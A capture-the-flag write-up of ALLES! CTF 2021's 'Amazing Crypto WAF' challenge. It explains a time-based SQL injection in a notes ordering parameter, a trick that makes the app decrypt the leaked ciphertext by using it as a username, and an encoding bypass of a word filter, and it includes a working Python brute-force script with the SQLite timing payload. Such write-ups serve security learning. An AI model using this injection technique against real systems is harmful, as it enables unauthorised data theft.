<-- home

ALLES! CTF 2021 / Amazing Crypto WAF

So last week I was able to play for a few hours with my team Super Gusser, once i joined Discord and found that already half of the web challenge siced :D , I chose this challenge as a start and my teammate sapra also joined.

main

First the challenge was very simple, you can create an account / log in and you can also post some notes.

main

Based on all of this and checking the source code which was a good hint for us rather than blindly trying to check all kinds of possible bugs :) .

Later, after reading the code and checking, sapra mentions that there is a possible SQL injection which was a time based SQLi in notes function..

main

basically we can inject after order by timestamp, using this sqli we can leak all data on sqlite database including the flag (the flag was located in the flagger account note)

main

But !! if we check the code again we can see that the app encrypts all data before inserting it into sqlite database and decrypts it again when requested

main

So the issue here, how we can decrypt the flag, even though we can leak it, as the encryption is strong enough and can’t be exploited, which means the only way is to find out how we can make the app decrypt the flag for us

The real problem is that if we post a note with the flag leaked, it will be encrypted again and decrypted once, which means we won’t be able to get the clear text, but there was a weakness in the code, exactly in the encryption function

main

As the application does not encrypt 'uuid', 'id', 'pk', 'username', 'password' and it does store it in plaintext, we can use this part and create an account with username as encrypted flag and once we are logged in the flag will be decrypted as the app decrypts all content of the response

response_data = decrypt_data(proxy_request.content)

So what’s left here is just leak the flag and decrypt it, but the last step was to bypass the easy waf that detects certain words.

main

Using a simple encoding can do the job here, which means we have all the steps we need :)

1 - Leak "flagger" account notes ( flag note )

2 - Create an account using flag as username

3 - Read the flag from the home page

import requests
import time

cookies = {
    'session': '116c6bf2d2de45a8d4a1bdac5524fc01.b810785f36c37cc8d4cf48b55c0e45716dd7ccb38f80ac19a08f2a41371711a',
}
#ENCRYPT:SzJEVHVzRmhHaHZmU2pYak0yQVZzQT09OmUzOVBwcXNVWWdhMEw0YXpCVDV2WHRwYnBPRXFaSVpqMFpQRk1BMXNzODE1UGxIUXhwb0hLY2diNGd2VTRYYz06REpPTWk0S01pdmZ3cXVxNFBGcklTdz09
flag_enc = "ENCRYPT:"

pos = len(flag_enc) + 1

for x in range( pos, 200 ):
    for i in "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/=":
        t1 = time.time()
        url = "https://7b000000c73b13b1628e0950-amazing-crypto-waf.challenge.master.allesctf.net:31337/notes%3forder=asc,(CASE%20WHEN%20(select%20substr((select%20body%20from%20notes%20where%20user=(select%20uuid%20from%20users%20where%20username='flagger'))," + str(x) + ",1)%20=%20'" + str(i) + "')%20THEN%2012=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000/2))))%20ELSE%20timestamp%20END)%20desc%23"
        response = requests.get(url, cookies=cookies)
        t2 = time.time()
        if (t2 - t1) > 0.9:
            flag_enc += i
            break        
    print flag_enc

And here is the FLAG : ALLES!{American_scientists_said,_dont_do_WAFs!}

main